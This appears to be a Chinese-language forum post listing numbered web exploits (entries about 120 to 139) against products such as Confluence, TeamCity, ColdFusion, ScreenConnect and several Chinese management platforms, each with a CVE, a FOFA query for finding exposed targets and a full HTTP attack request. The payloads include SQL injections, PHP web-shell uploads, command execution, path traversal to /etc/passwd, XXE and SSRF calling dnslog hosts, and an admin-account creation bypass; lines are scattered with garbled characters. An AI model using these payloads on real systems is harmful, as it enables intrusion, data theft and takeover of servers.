3 l2 k' j8 x1 W; \( b6 a8 EX-Originating-Ip: 1.1.1.1; l, h& b2 N K$ U8 K$ M
X-Remote-Ip: 1.1.1.1& m) t2 m6 F' `! `; d# d" x' I3 p
X-Remote-Addr: 1.1.1.1
" j% g5 g9 M+ M( `Te: trailers( ~' G) X. h0 Z3 D% U( a
Connection: close
# d9 k6 g4 v4 T# I- |* q
+ [. E1 a* ]" v# S- `2 ]8 Hsrc=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456
; k( u& O. f$ s+ y! v# J
9 k4 e+ X1 ]! u, n1 l( j/ K \. l
/ J5 x3 M3 j. {0 S7 j" O- A8 n120. 北京百绰智能S40管理平台导入web.php任意文件上传
: s6 b( K7 V+ a1 [: t& N6 _CVE-2024-1253
- ]8 H( N$ K3 n a, g* zFOFA:title="Smart管理平台". l5 L9 ?% d( U. I- s n
POST /useratte/web.php? HTTP/1.1# r6 P/ ~& C( `$ m- J
Host: ip:port8 j1 K+ i( a, V+ `! g
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
- l$ p' r. Y$ P* Q2 U% hUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko) M3 J+ T8 t* c7 K
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
! W( _" P. ~7 \3 t; J+ g; |! ZAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2' x$ J Y6 j, i$ n2 P/ r: d X0 o% y
Accept-Encoding: gzip, deflate, ?7 T- h' ]: K+ Y6 J+ @' S7 @
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
9 N9 ~! [$ g0 pContent-Length: 597
) G; X! s# W ]( ?) x3 q4 COrigin: https://ip:port+ m; E) x5 I; X/ v& T. M
Referer: https://ip:port/sysmanage/licence.php. a9 _) E; r/ N# W& S/ s
Upgrade-Insecure-Requests: 1
9 P M3 _& ^" }: LSec-Fetch-Dest: document
6 ^; u) t2 D: Q; Z5 k; t, \# t; iSec-Fetch-Mode: navigate# T4 `( c" ~+ g8 }% N; i Z L/ z
Sec-Fetch-Site: same-origin @1 ]! T( Q& B6 R/ z2 o
Sec-Fetch-User: ?1
- h8 ^2 _3 G j8 }* ATe: trailers
) X( I7 y- H) ? \. j( i' L/ V% YConnection: close
d% `" e) D& F! w
2 \3 A, {7 C) Y-----------------------------42328904123665875270630079328* e8 |* W- |# t
Content-Disposition: form-data; name="file_upload"; filename="2.php"9 X A# Y1 A# e* z9 ]/ X& G
Content-Type: application/octet-stream" L# l( W+ i2 u
7 D& g: J8 S+ a& L1 [<?php phpinfo()?>
( z5 Y, y/ P( e% q-----------------------------42328904123665875270630079328
) \( f0 s" v* a$ m# L2 u" hContent-Disposition: form-data; name="id_type"+ |* ]# C5 J! \, R) [$ ], W! R
* F) _7 R7 y$ K: B
13 B \- J, @1 Q: s( Z. E( k
-----------------------------42328904123665875270630079328! B7 Y9 x2 B# t
Content-Disposition: form-data; name="1_ck"
. `1 T! ]! C% L. w d! Q) q$ `; P4 ?
1_radhttp
. i- i& I# \+ W- D-----------------------------42328904123665875270630079328 t+ |+ b6 M# n
Content-Disposition: form-data; name="mode"1 ]: D5 z" t/ ^9 h: y
& V' d* ?- B- c. r4 g: ^
import
3 E- A' \3 r7 s- r" b' w8 Z+ D" K-----------------------------42328904123665875270630079328; L& Q3 F* l. r. l8 y
, o( Z+ Z/ t' E5 L% E, w1 L' A9 [
文件路径/upload/2.php; `( O4 D8 H8 V- S
/ N) Y e5 G/ F0 u% M# c! c; ^121. 北京百绰智能S42管理平台userattestation.php任意文件上传
' ?/ [- N% H sCVE-2024-1918
/ \ y6 R }. k0 E2 nFOFA:title="Smart管理平台"* \; @+ [. A; Y. \% t1 y" L. V
POST /useratte/userattestation.php HTTP/1.1
# Y# _, z( k; _$ nHost: 192.168.40.130:8443
* l1 v( K$ ^* c1 {Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
" a% s) ]/ D- p8 J7 b* a9 M$ y+ F( WUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
$ T$ a* L: q2 }2 R; O! G/ V0 SAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.81 @3 D& X+ s B6 Y0 m
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2* r3 {9 j' d. M: p/ a" D' a8 H- j
Accept-Encoding: gzip, deflate
/ ]3 b( p4 L6 a0 q( K2 {Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328) [/ I, r) s1 e$ n, G4 h# M. I
Content-Length: 592
# P i/ G8 @! g0 hOrigin: https://192.168.40.130:8443
6 p* {8 R9 j: C- N A, M- rUpgrade-Insecure-Requests: 1( l8 _6 k" N; p2 ?: m
Sec-Fetch-Dest: document
( t1 y T# |% ]3 [+ e' DSec-Fetch-Mode: navigate" k( I8 C- P4 d# c3 W6 v
Sec-Fetch-Site: same-origin
* J# _5 `% @7 dSec-Fetch-User: ?1' |( Q& A; P- T$ B: I, M
Te: trailers: p/ f/ _, e8 k) |+ A! B- @
Connection: close
, _, W2 A9 q5 n' l P% z' u6 |/ H% ^) y+ a: R$ ?, J
-----------------------------42328904123665875270630079328
& S8 {# @- z/ l! gContent-Disposition: form-data; name="web_img"; filename="1.php"
! _- v7 j4 k9 E4 e" r8 XContent-Type: application/octet-stream3 f) L) V2 Z& |
- A$ Z2 N# m1 W- S8 w: }2 n<?php phpinfo();?>
7 K2 v6 h9 d+ a/ g" i* C-----------------------------42328904123665875270630079328
# S6 h0 Y' ?# _3 @8 YContent-Disposition: form-data; name="id_type"
! l. d$ M- s7 e0 G9 ?2 c; x* F" V& X: S( C, A
1
7 Z! d9 N0 D$ L-----------------------------42328904123665875270630079328
2 Q& h, Z' z q; g, D- VContent-Disposition: form-data; name="1_ck" I. x" d, {$ Z+ j6 w
) t- u& p2 Y% a8 H+ `3 W
1_radhttp
! d/ h& F, d4 f* g2 `- q$ B-----------------------------42328904123665875270630079328" [) h1 I$ T9 v0 h; P v7 Y
Content-Disposition: form-data; name="hidwel"
, i3 {/ D. O1 T0 ], l4 ~6 v: v( }: z1 m1 o7 T' z/ e8 n
set
1 D9 w9 ]& ^% _-----------------------------42328904123665875270630079328* G' `0 S, x5 G+ u
" O1 j/ _" h% w6 n" G
) v. t. P' r1 @& v* mboot/web/upload/weblogo/1.php
& j0 E5 F" x5 F) x2 a6 @: V
& @; E; J5 G/ N; q9 q, s122. 北京百绰智能s200管理平台/importexport.php sql注入
+ G3 ^8 x0 n6 [, _0 Z9 w6 fCVE-2024-27718FOFA:title="Smart管理平台"
; ~3 Z! ^* q0 F1 E. ]+ t其中sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=是sql语句使用base64加密后的内容,原文:sql=select 1,database(),version()
7 q+ s P- L% wGET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1) E6 l: Z% g$ \, R, c" `
Host: x.x.x.x
! [: t! h$ _7 I/ c4 OCookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
4 C& m3 z% v; B" { ]User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0" M5 q1 I! v7 a. n" c9 G
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
, _! K" f& b" D0 aAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.24 f4 k3 n* ~7 ~ ~2 t; z
Accept-Encoding: gzip, deflate, br
9 Y n6 j, z: J6 o. y3 z7 M3 hUpgrade-Insecure-Requests: 1. }6 q, Q! b: P s, {
Sec-Fetch-Dest: document
. n1 q! M5 d/ |6 ~% {3 G3 GSec-Fetch-Mode: navigate
/ A/ g9 W6 [8 U* n# cSec-Fetch-Site: none7 s+ B) x2 A" S6 P1 V! j, `
Sec-Fetch-User: ?1
) f3 D' F6 Z: t! W7 c3 RTe: trailers
1 c* y' e7 T$ W, W9 n2 `Connection: close
) q8 M$ O k9 S: p$ B$ }! [7 H& F' K) i2 M
& u# A+ S, `, N9 B# T0 E0 q
123. Atlassian Confluence 模板注入代码执行' i: q6 J+ w8 l- ?, a
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3". T0 [ ]4 s A" t) ]
POST /template/aui/text-inline.vm HTTP/1.1
8 M+ a8 x9 j; q% a0 \5 ZHost: localhost:8090
7 F% J2 W3 f& j( }' t$ e: I8 DAccept-Encoding: gzip, deflate, br
+ T; c8 w" \2 HAccept: */*
! a' I, l8 {3 L1 n# Q/ c' S1 XAccept-Language: en-US;q=0.9,en;q=0.8# s, U1 r4 }6 j
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36% D6 @0 [/ L3 h
Connection: close
) y5 O4 }- c+ X3 _Content-Type: application/x-www-form-urlencoded
2 ?4 z$ S- F3 x* s1 p; j6 v% y' V9 m' f& Q; C
label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))
+ s, L$ `. |# \) g7 c m+ T9 I$ p* d0 u6 o: u5 A
; L9 B N; D3 t4 w
124. 湖南建研工程质量检测系统任意文件上传
+ F2 o4 V0 i; a% R2 S: yFOFA:body="/Content/Theme/Standard/webSite/login.css"
' I/ e# T( T4 M( @; r1 j" e, M5 vPOST /Scripts/admintool?type=updatefile HTTP/1.19 ^8 V+ [ j# F8 v; X5 M0 `3 l
Host: 192.168.40.130:82829 u* s3 K6 D2 O0 N. O
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
& ^2 g: o4 }( ~& eContent-Length: 72
; J( p0 W+ Z0 \/ s2 R# Q, l5 }6 jAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8: J4 R4 t4 N: \1 M/ j
Accept-Encoding: gzip, deflate, br# ]# ~2 d9 B& R+ b+ Z, c O
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
: j5 U+ U7 t, t/ Z3 KConnection: close# G4 a! W5 u, @; e% d8 b
Content-Type: application/x-www-form-urlencoded8 R4 F6 ^/ T& s5 d9 |
4 l3 M: H4 \2 S# F8 X g' U) G5 rfilePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>- ?. p- N; l$ {8 M: A7 @, l J* Q
3 P5 U" V: w" D# m9 m; @( v& M7 |
! r T* z1 M- a8 `8 C4 }4 a/ |( Z( Vhttp://192.168.40.130:8282/Scripts/abcgcg.aspx
0 y; T8 q% X9 [ t, q) q& C- O
, \' r. L2 i8 D9 o% a2 U) j125. ConnectWise ScreenConnect身份验证绕过
& Y* x! `" K1 l; U0 M, MCVE-2024-1709+ M2 f$ s( h3 u, N: x. w
FOFA:icon_hash="-82958153"6 O0 d3 [, ^3 Y$ P
https://github.com/watchtowrlabs ... bypass-add-user-poc' j2 V. R/ y7 C/ _; e+ z
3 |; ] l4 ^% y/ r
A" {# ~ Z8 f( l, c8 |
使用方法
# K- U# v" S3 `7 X1 `python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!
- j+ m: \; v! F' g( |, a" B0 q% l6 D3 H1 Y p
+ s% H4 B) \: ^6 z! P创建好用户后直接登录后台,可以执行系统命令。
/ l7 y$ b4 x$ R2 B9 X6 }+ H! C+ i$ k# d0 D7 S8 d" H6 T9 d
126. Aiohttp 路径遍历
5 \& T L/ v- u7 P) KFOFA:title=="ComfyUI"
* I6 \! G ~: r, D/ B3 C1 n4 ]GET /static/../../../../../etc/passwd HTTP/1.1
% s6 |( F3 |3 `( T ^Host: x.x.x.x& r# h5 n0 Q o( x! s% ` k
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36; `, F+ S R% ^ V4 m# U+ @1 t/ F# e
Connection: close
7 M2 }! d- P0 w- ]# S2 CAccept: */*
& P7 p8 z% U) K$ {% xAccept-Language: en: E8 ?4 x* N. H4 z# O! \4 V& w
Accept-Encoding: gzip& z7 c9 H1 R/ a$ I
- N4 _" A# L. F- ?6 R( R+ ], [7 n9 b1 @
+ s0 X" M4 H! d127. 广联达Linkworks DataExchange.ashx XXE4 N+ v, V0 S1 A* P% o3 N
FOFA:body="Services/Identification/login.ashx" ! L& {& a! w ?( K
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
, y, @0 H3 J/ z8 E8 c- UHost: 192.168.40.130:8888
* t" v0 }& |/ u0 A" IUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
- `! [, p% }' \+ X1 @Content-Length: 4153 q- W( R+ Z- X1 Q3 b( o! w8 w/ `
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
# T5 N) D! D7 k7 D4 D) h# |Accept-Encoding: gzip, deflate
- w( f1 c- w" g, w7 ?; s5 iAccept-Language: zh-CN,zh;q=0.9
4 b5 X9 A5 T& TConnection: close
- v- _# k4 o5 E/ k# HContent-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe07 x+ R# M V: A9 S' R# o9 z4 E
Purpose: prefetch
: i2 d$ F. f" KSec-Purpose: prefetch;prerender2 [) p' S2 Z$ B# ^
) _( J7 \1 s' w* n4 ~: w------WebKitFormBoundaryJGgV5l5ta05yAIe0
, B T. M ^+ L& pContent-Disposition: form-data;name="SystemName"
4 m3 E: I& l j2 {4 p) A$ _
* j9 \& j* B! F8 o1 Z/ SBIM
6 y8 v* t s5 v: y g) t# [* u7 ?------WebKitFormBoundaryJGgV5l5ta05yAIe0
?% O$ ]9 Z" C3 m& x3 \$ o0 I. ?Content-Disposition: form-data;name="Params"# Z. q+ j9 T1 E8 e
Content-Type: text/plain2 D( G# G7 z. }& y! c. z! H
& _* l3 \9 t" u/ c5 W' E/ a4 ?1 L+ `) `
<?xml version="1.0" encoding="UTF-8"?>3 D, v" B, m, p4 O& _& ~
<!DOCTYPE test [. A5 Q( u9 O' ?, |& W5 q
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
' y* o: L; V8 n! d# T]& p% }2 K3 k0 R
>7 y0 C( ?3 p3 f; p2 R" N, [' l
<test>&t;</test>8 r* H1 w4 z4 T0 j! {
------WebKitFormBoundaryJGgV5l5ta05yAIe0--$ E" D8 S) r7 V8 ]1 d* C' f% C* O
5 \. o( i9 h8 D* V
6 I) }0 w8 P# x, {0 ` u
: D8 k N% E9 K; A; p128. Adobe ColdFusion 反序列化
. `2 n7 \. e3 o9 I% ^2 R: C4 FCVE-2023-38203* Z7 _0 H' ]2 v6 x
Adobe ColdFusion版本2018u17(以及早期版本)、2021u7(以及早期版本)和2023u1(以及早期版本)
" n; @$ L- p! p. K$ e8 {2 h jFOFA:app="Adobe-ColdFusion"( `. x- r A6 s% C1 r
PAYLOAD+ D( ?/ q% F6 [) Y2 |% Z
|' g: C5 r5 i129. Adobe ColdFusion 任意文件读取
" O: m- E; M+ u. q2 |& n2 t2 DCVE-2024-20767
& J+ O5 v. X% o& Q8 ]. AFOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
( M; r% _5 {& ~! q第一步,获取uuid
: }0 ~: b" s5 u C4 \+ U" |- YGET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1% p& S# G7 R4 _* u2 S7 Z# o
Host: x.x.x.x! h7 s+ y- |- I' }) E$ Y( G& S
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.366 N) P& z- S( N) g
Accept: */*
5 {) H U1 Z- y/ f2 e- h: ^/ w+ n" LAccept-Encoding: gzip, deflate
- o5 E/ V$ y5 M0 z6 j! TConnection: close+ l' v/ ]( v9 v, ^
& ?5 `& g8 D* m
& ?6 f1 ^& _/ K0 K5 @4 T: Z& i1 m6 K; S
第二步,读取/etc/passwd文件
2 n. h# @. X5 ^GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
4 L+ \# W* [. ~0 q5 D1 pHost: x.x.x.x
; d! H5 B5 k0 `' @! P Y! Y4 fUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
: h1 h1 s3 `* HAccept: */*& c) D2 r- u# E# A# P! P4 A
Accept-Encoding: gzip, deflate; E3 T1 o y$ p) e; K I6 s
Connection: close
0 U2 P$ I8 X) r3 v( U0 d5 c4 d; uuuid: 85f60018-a654-4410-a783-f81cbd5000b9
/ }0 }' ^5 V/ c7 a! \5 {7 f5 p+ M9 g$ S1 k( D0 V
8 z3 Y* B2 t5 y7 ~% k130. Laykefu客服系统任意文件上传
6 M0 \& I: D9 \FOFA:icon_hash="-334624619"! s0 ]$ B( K) Y% L
POST /admin/users/upavatar.html HTTP/1.1" \3 A5 G# m0 f
Host: 127.0.0.1
5 S i1 y% S4 U( b( TAccept: application/json, text/javascript, */*; q=0.01
) \" g/ o% Q% E/ {5 X5 A# [( J9 @& MX-Requested-With: XMLHttpRequest
3 }. Q/ O! ` g3 s, VUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
7 L9 o4 L k% P7 z. X' ^Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR# T; @+ L. ^! R$ Y5 \$ ]/ }
Accept-Encoding: gzip, deflate0 H" d. U/ t& e- a
Accept-Language: zh-CN,zh;q=0.9
6 N E- K% d& x4 O' g% qCookie: user_name=1; user_id=31 R' _) {8 n( j ~
Connection: close
4 w+ d3 F( n4 |
/ M, D8 R$ E0 E: `------WebKitFormBoundary3OCVBiwBVsNuB2kR
; v- ?4 }* m% ] \; L4 p: Y6 h, cContent-Disposition: form-data; name="file"; filename="1.php"
" p8 l# T8 b- [8 J$ y' [1 |* J; |Content-Type: image/png
7 X% @# T4 K. ~3 o, a1 x
( @2 W$ u0 q; |0 u# @- n<?php phpinfo();@eval($_POST['sec']);?>/ R2 |( A: C( `5 @% O
------WebKitFormBoundary3OCVBiwBVsNuB2kR--( A; K4 L g- u
- R F' f' B4 \) q. @% R5 s
) H6 q* a7 j8 W; d- @4 R7 ]
131. Mini-Tmall <=20231017 SQL注入- @0 r6 h0 j% P$ y
FOFA:icon_hash="-2087517259"
' p; x+ l! ?) `后台地址:http://localhost:8080/tmall/admin, ^6 A/ C& k$ U% E6 @$ E
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)
5 V7 k: Q& i# K5 j* l; I8 D% @2 P$ H
132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过
0 E; e- i0 i {7 w8 o5 {0 _CVE-2024-27198
( o7 \+ Z9 G2 T3 ~1 v% mFOFA:body="Log in to TeamCity"
; u; z$ m& _, g* M8 \. K$ `. wPOST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
, Y. ?1 e, l n2 `' THost: 192.168.40.130:8111
. L( |, S. m/ M( O. k5 IUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.368 J& M; }1 {* ]2 r% S( h0 [
Accept: */*! Y2 H! J( n. M' x* m3 E+ W
Content-Type: application/json
$ R k, q% w, T" p& lAccept-Encoding: gzip, deflate
" s6 ?; E% _! Y! A# T, J$ q& @ g' J |2 Z3 W8 R; s0 [! z
{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}
! m {1 l* J3 E* W9 L$ y2 W6 E
3 ]; A& H8 a$ X, XCVE-2024-27199
2 l8 L1 c7 D! Y0 h h/res/../admin/diagnostic.jsp
0 E* h* Q( x9 E2 N6 ~/.well-known/acme-challenge/../../admin/diagnostic.jsp
& _. r% h8 ]$ J1 B$ [. t: f7 X/update/../admin/diagnostic.jsp& U, ~' l8 K3 u0 V
* n# W- C! w9 e( h& X0 D
$ A) a: c, y9 d& L: {7 dCVE-2024-27198-RCE.py7 J* K1 E, Q+ |9 X
9 T4 ]; U/ _1 d3 G+ K$ B
133. H5 云商城 file.php 文件上传
1 T- w. ~ F$ p! b. rFOFA:body="/public/qbsp.php"* C2 F+ J) e7 v! B$ f
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
- u. q J n1 o0 p) m: t; b1 W; KHost: your-ip
$ @2 |+ W' |; \9 D( RUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
' E( \ w& S. dContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx9 x, C$ T: r2 O* H8 t0 i" T) y) d0 B
8 z! N! ?" Y4 r6 L, t
------WebKitFormBoundaryFQqYtrIWb8iBxUCx
! ?8 c( ^0 z2 @' h+ f4 Y% z }Content-Disposition: form-data; name="file"; filename="rce.php"
$ S% z. s# k' B# S3 vContent-Type: application/octet-stream# F& b; |& |7 t5 I) r3 t- ~
( O! r$ U W% k
<?php system("cat /etc/passwd");unlink(__FILE__);?>
! W- ^7 K3 O @/ [( n& \' p------WebKitFormBoundaryFQqYtrIWb8iBxUCx--% f8 ^& a( }; o7 Y
+ t/ G) m! s$ N; y% ~) y: I9 W8 w3 r F7 D! ]% W
# N: [, m* V- Q3 {2 g: y# i134. 网康NS-ASG应用安全网关index.php sql注入! |& Y9 Z3 O6 P: ]* Q; c# N
CVE-2024-2330% y5 V: Y2 z( Q: `) d( u
Netentsec NS-ASG Application Security Gateway 6.3版本3 m2 X$ f/ N3 x% F
FOFA:app="网康科技-NS-ASG安全网关"2 @0 ^+ w' k4 W7 | u
POST /protocol/index.php HTTP/1.1' h: R7 Q3 i; ?) y
Host: x.x.x.x
, Z; Z; @- L+ b9 g; W) dCookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
; L& C- [0 a: C( EUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.00 p& Z/ _$ Z/ I6 j! S9 f
Accept: */*, B, M! o: l& a8 o
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
. U, R& J( b$ \/ `) a @Accept-Encoding: gzip, deflate" U: ~/ {& ]( F
Sec-Fetch-Dest: empty% t/ i2 [3 W- E& Y! q7 a
Sec-Fetch-Mode: cors ?7 _1 l% W' [' G
Sec-Fetch-Site: same-origin0 W* u7 A, @" z8 i. F8 ~* R
Te: trailers, @; K9 D- Y3 V Q
Connection: close+ u% s( j+ S) I) f1 F
Content-Type: application/x-www-form-urlencoded3 V: o; X6 y: U7 U5 v
Content-Length: 2638 t1 a, f" U. z3 i9 E
* `9 y% [; i' v, t! O& n/ Ljsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}# ^2 i4 m* J7 E( W, o2 ?) x5 K
# d( }" d' B+ ~; |0 l$ z
$ ~) y+ P: J" }' a& O135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入
4 V: ?: E; _/ p! O0 U) eCVE-2024-2022% f. q0 S, u0 P9 F* |7 L) D
Netentsec NS-ASG Application Security Gateway 6.3版本/ k5 S% h9 s% s5 H5 p
FOFA:app="网康科技-NS-ASG安全网关"
! a9 ?& e( O, u1 }& R BGET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.18 b8 s! p( g. ^2 p
Host: x.x.x.x1 e( \5 M. Q5 \! l8 @3 E0 r' i
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.365 P% K: t6 L2 ?2 R$ z
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7) A- F* c0 T p4 V0 `. R
Accept-Encoding: gzip, deflate- k7 t+ X: X) k
Accept-Language: zh-CN,zh;q=0.98 e8 U s: _2 {$ \) U! ^( P, Y
Connection: close1 P8 T1 ~+ W: ^) T
1 j; B1 d, ?3 ^& t, e$ S: ?4 U+ ^& D+ m* l$ e
136. NextChat cors SSRF
6 w5 F! k0 M- Y0 K n7 ECVE-2023-49785( z5 `- B3 D6 j! a- ?5 G" Z, c
FOFA:title="NextChat"
( m4 t/ e( L% H' P" H) i) Q- ^$ OGET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
* {9 q# E/ J. X6 MHost: x.x.x.x:100001 ]9 P) Y$ C1 E7 I/ I% u; N
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
3 Z# O* Z( U; t3 kConnection: close, I* q1 [! J1 `1 X2 t
Accept: */*
2 r" f$ j5 L) w* ~/ cAccept-Language: en5 U' c! R' ]. i) L' ]) w. s
Accept-Encoding: gzip- p+ k2 H, [7 c( L+ i& Q2 F
) C5 G* Q, E" c; J7 r1 v) U
' b* x* ^: d) V- f8 Z d$ m7 J, ^137. 福建科立迅通信指挥调度平台down_file.php sql注入" S$ Y+ u3 E9 N. A
CVE-2024-2620& W1 }; r* D G) u, ^1 S
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"5 Y8 M7 `% j& U1 n, _
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
m! \* S$ m0 w- y6 I' f- qHost: x.x.x.x
5 q) J: m" i8 L( x. VUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0* y; i4 l9 `& u( O
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 y) O; W0 f( g7 Z! k, i( M
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
9 q% O+ z7 @/ H( N$ r( SAccept-Encoding: gzip, deflate, br8 w% I* V/ Q7 ]: t3 n" K
Connection: close# X+ ^. W1 m2 |' a1 E
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
1 X1 W4 p, \/ e( r4 v/ d+ ^Upgrade-Insecure-Requests: 1/ k+ Y& ?* @9 W$ x( h) y. ? e
& }0 | U8 H* I
& n' m* d# { I2 \- z( U138. 福建科立讯通信指挥调度平台pwd_update.php sql注入
* b" _: `: w1 @3 k9 U' u3 PCVE-2024-2621' ?6 }4 M8 w; q% r$ U, A3 T3 A5 J
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
+ o$ D2 o+ s% E0 a; J7 qGET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
& H; k' X' d* X" bHost: x.x.x.x! v6 s) `' y) D/ j% [( d
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
! P+ t3 I8 Z* m2 V, VAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8# ?' q& W: g7 r: G
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
% U; Y# [" h: R' U! S$ R5 l7 EAccept-Encoding: gzip, deflate, br G3 Z+ J8 x4 T) {2 T; w/ @0 N0 S
Connection: close+ g# Q, ?1 i, Q' D8 R7 ]
Upgrade-Insecure-Requests: 1
% o! c/ j. L0 Q- n; F
7 F: O8 I% X B. E7 I; f3 g# Q# @' Z$ Q2 c [2 R* f
139. 福建科立讯通信指挥调度平台editemedia.php sql注入/ F; Y9 h0 f' y/ X5 [' L3 z# s6 `
CVE-2024-2622" {; M6 C# Y' ]7 ~1 i% @5 a3 h
